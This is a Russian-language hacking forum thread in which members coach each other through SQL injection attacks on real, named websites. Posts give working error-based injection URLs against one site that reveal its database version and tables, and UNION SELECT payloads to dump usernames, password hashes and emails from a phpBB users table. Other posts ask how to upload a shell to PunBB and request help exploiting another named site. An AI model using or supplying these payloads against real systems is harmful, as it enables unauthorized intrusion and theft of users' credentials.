Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. warlok

    warlok Elder - Старейшина

    Joined:
    17 Feb 2008
    Messages:
    337
    Likes Received:
    142
    Reputations:
    81
    http://ru.wikipedia.org/wiki/UNIX-время
     
    1 person likes this.
  2. Linkus

    Linkus Member

    Joined:
    20 Dec 2008
    Messages:
    168
    Likes Received:
    15
    Reputations:
    -1
    Огромнейшее спасибо. :)
     
  3. FlaktW

    FlaktW Elder - Старейшина

    Joined:
    19 Aug 2009
    Messages:
    496
    Likes Received:
    33
    Reputations:
    12
    Набираю в админке: 'or+5=5)--

    выскакивает такая ошибка:

    error executing query select id from trustee where name = ''or+5=5)-- ':
    You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ')-- '' at line 1

    Как тут правильно составить запрос?

    Заранее всем спасибо!
     
  4. ElteRUS

    ElteRUS Elder - Старейшина

    Joined:
    11 Oct 2007
    Messages:
    367
    Likes Received:
    460
    Reputations:
    93
    Пробуй '+||+'1
     
    1 person likes this.
  5. попугай

    попугай Elder - Старейшина

    Joined:
    15 Jan 2008
    Messages:
    1,588
    Likes Received:
    405
    Reputations:
    196

    не плюсы, а пробелы используй.
     
  6. FlaktW

    FlaktW Elder - Старейшина

    Joined:
    19 Aug 2009
    Messages:
    496
    Likes Received:
    33
    Reputations:
    12
    Не получается, вот админка попробуйте сами:

    http://www.vierpfoten.org/redadmin
     
  7. Дирижабль

    Дирижабль [ ✯✯✯ Ядерный Суицид ✯✯✯ ]

    Joined:
    6 Jan 2010
    Messages:
    369
    Likes Received:
    346
    Reputations:
    292
    Code:
    http://www.vierpfoten.org/website/output.php?id=1001%27+and+%28select*from%28select+count%28*%29from%28select+1+union+select+2+union+select+3%29x+group+by%20concat%28mid%28%28select+version%28%29+from+INFORMATION_SCHEMA.TABLES+limit+0,1%29,1,33%29,floor%28rand%280%29*2%29%29%29z%29/*

    Version:
    5.0.22-Debian_0ubuntu
    database: cmsVpOrgNe
    ищи я уверен ты найдешь там что нужно ;)

    Code:
    http://www.vierpfoten.org/website/output.php?id=1001%27+and+%28select*from%28select+count%28*%29from%28select+1+union+select+2+union+select+3%29x+group+by%20concat%28mid%28%28select+table_name+from+INFORMATION_SCHEMA.TABLES+limit+0,1%29,1,10%29,floor%28rand%280%29*2%29%29%29z%29/*
     
    _________________________
    #12267 Дирижабль, 9 Apr 2010
    Last edited: 9 Apr 2010
    2 people like this.
  8. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,254
    Likes Received:
    1,147
    Reputations:
    886
    ребят помогите са скулом :( есть таблица phpbb_users

    table_rows возвращает 4186 :)

    а когда делаю запрос union+select+1,2+from+phpbb_users--
    выдает ошибку :( help!!
     
    _________________________
  9. SeNaP

    SeNaP Elder - Старейшина

    Joined:
    7 Aug 2008
    Messages:
    378
    Likes Received:
    69
    Reputations:
    20
    Ты пытаешься вывести колонки 1 и 2 , которые не существуют в таблице phpbb_users
    Почитай внимательнее
     
    #12269 SeNaP, 9 Apr 2010
    Last edited: 9 Apr 2010
  10. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,254
    Likes Received:
    1,147
    Reputations:
    886
    union+select+concat(username,char(58),user_password,char(58),user_email,char(58),user_icq),2+from+phpbb_users--

    тоже возвращает ошибку :rolleyes:
     
    _________________________
  11. SeNaP

    SeNaP Elder - Старейшина

    Joined:
    7 Aug 2008
    Messages:
    378
    Likes Received:
    69
    Reputations:
    20
    union+select+concat_ws(0x3a,username,user_password,user_email,user_icq),2+from+ph pbb_users--
     
  12. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,254
    Likes Received:
    1,147
    Reputations:
    886
    Дело Не в Этом,просто не дает вывести инфу с таблицы ..а запрос правильный :rolleyes:
     
    _________________________
  13. PaCo

    PaCo Elder - Старейшина

    Joined:
    6 Feb 2008
    Messages:
    464
    Likes Received:
    139
    Reputations:
    25
    Konqi телепатов нет - какую ошибку выдает? Мейби с кодировкой что то не то и нужно например unhex(hex(, e.g.: union+select+unhex(hex(concat_ws(0x3a,username,user_password ,user_email,user_icq))),2+from+ph pbb_users--
     
  14. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,254
    Likes Received:
    1,147
    Reputations:
    886
    +union+select+1,2+from+information_schema.tables NORM

    +union+select+1,2+from+phpbb_users ERROR

    но знаю что таблица существует

    table_rows возвращает 4186 ,значит таблица не пуста
     
    _________________________
  15. PaCo

    PaCo Elder - Старейшина

    Joined:
    6 Feb 2008
    Messages:
    464
    Likes Received:
    139
    Reputations:
    25
    Возможно что:
    1)Проблемы с кодировкой, как можно решить описал.
    2)Не достаточно грантов на phpbb_users.
    3)phpbb_users нет.
    4)Какая то хитрая гверя или скрипт выполняющий запрос что то меняет(мало вероятно).
    5)ХЗ.
     
  16. Kakoytoxaker

    Kakoytoxaker Elder - Старейшина

    Joined:
    18 Feb 2008
    Messages:
    1,038
    Likes Received:
    1,138
    Reputations:
    350
    Konqi
    Когда Вы научитесь читать что-то?

    Даю 99% что таблица в другой базе, этот вопрос сдесь задавали раз 500
    В мускуле нельзя разграничить права на таблицы, только базы
     
  17. daniel_1024

    daniel_1024 Elder - Старейшина

    Joined:
    15 Jul 2009
    Messages:
    260
    Likes Received:
    227
    Reputations:
    386
    есть способы заливки шелла в PunBB 1.2.15 с правами админа ?
    пробывал сплоент http://www.security.nnov.ru/files/punBB_spl.pl, не работает
     
  18. Дирижабль

    Дирижабль [ ✯✯✯ Ядерный Суицид ✯✯✯ ]

    Joined:
    6 Jan 2010
    Messages:
    369
    Likes Received:
    346
    Reputations:
    292

    from+phpbb_users where table_schema='база с таблицой phpbb_users'
     
    _________________________
    1 person likes this.
  19. ILYAtirtir

    ILYAtirtir Elder - Старейшина

    Joined:
    25 Apr 2007
    Messages:
    143
    Likes Received:
    244
    Reputations:
    73
    Cначало
    Выдаёт базу.Потом:
     
    2 people like this.
  20. Darren

    Darren Banned

    Joined:
    14 Jun 2008
    Messages:
    34
    Likes Received:
    5
    Reputations:
    6
    http://www.nzp.co.nz/company.php?pg=79/**/order/**/by/**/4/*

    помогите раскрутить скуль
    Как я понял выводится только через ошибку
     
Loading...
Thread Status:
Not open for further replies.